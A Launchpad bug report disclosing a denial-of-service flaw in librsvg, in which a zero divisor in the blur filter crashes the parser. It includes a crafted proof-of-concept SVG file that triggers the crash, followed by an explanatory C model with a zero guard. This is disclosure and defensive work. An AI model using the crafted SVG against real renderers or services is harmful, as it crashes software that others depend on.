** Information type changed from Private Security to Public Security

** Changed in: librsvg (Ubuntu)
       Status: New => Confirmed
https://bugs.launchpad.net/bugs/1697283

Title:
  Denial of Service Vulnerability in Librsvg

Status in librsvg package in Ubuntu:
  Confirmed

Bug description:
  A SIGFPE is raised in function box_blur_line of rsvg-filter.c when
  librsvg tries to parse a crafted SVG file.

  https://github.com/GNOME/librsvg/blob/master/rsvg-filter.c#L1439

              if (output >= 0)
                  dest[bpp * output + i] = (ac[i] + (coverage >> 1)) / coverage;
          }

  The coverage could be zero.

  testcase.svg

  <svg width="100" height="120" xmlns="http://www.w3.org/2000/svg"
       xmlns:xlink="http://www.w3.org/1999/xlink">
    <filter id="blurMe">
      <feGaussianBlur in="SourceGraphic" stdDeviation="0.053192302807822195 20" />
    </filter>
    <circle cx="50" cy="50" r="50" fill="green" filter="url(#blurMe)" />
  </svg>
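A simplified single-channel model of the sliding-window average around the quoted line, added here as an example; it is not librsvg's code and not part of the bug report. The name blur_line_checked, the window bookkeeping and the sample row are assumptions made for illustration: in this model a zero-width box makes coverage zero, and the guard returns an error instead of dividing.

```c
#include <stdio.h>

/* Constructed sample row and output buffer (not taken from the report). */
static const unsigned char sample_row[4] = { 10, 20, 30, 40 };
static unsigned char out_row[4];

/*
 * Hypothetical single-channel sliding box average. Each output pixel is the
 * rounded mean of the source pixels currently under the box, using the same
 * rounding expression as the excerpt: (ac + (coverage >> 1)) / coverage.
 * Returns 0 on success, -1 if the division would be by zero.
 */
static int blur_line_checked(int box_width, const unsigned char *src,
                             unsigned char *dest, int len)
{
    if (box_width < 0 || len <= 0)
        return -1;

    int lead = 0;                             /* leading edge of the box   */
    int output = lead - (box_width - 1) / 2;  /* pixel being written       */
    int trail = lead - box_width;             /* pixel leaving the box     */
    unsigned int ac = 0;                      /* running sum under the box */

    while (output < len) {
        /* Pixels that are both inside the row and under the box. */
        int coverage = (lead < len ? lead : len - 1) - (trail >= 0 ? trail : -1);

        if (lead < len)
            ac += src[lead];
        if (trail >= 0)
            ac -= src[trail];

        if (output >= 0) {
            /* Guard: integer division by zero is undefined behaviour in C;
             * the report observed it as SIGFPE. */
            if (coverage <= 0)
                return -1;
            dest[output] = (unsigned char)((ac + ((unsigned)coverage >> 1))
                                           / (unsigned)coverage);
        }
        lead++; output++; trail++;
    }
    return 0;
}

int main(void)
{
    printf("width 0 -> %d\n", blur_line_checked(0, sample_row, out_row, 4));
    printf("width 3 -> %d\n", blur_line_checked(3, sample_row, out_row, 4));
    return 0;
}
```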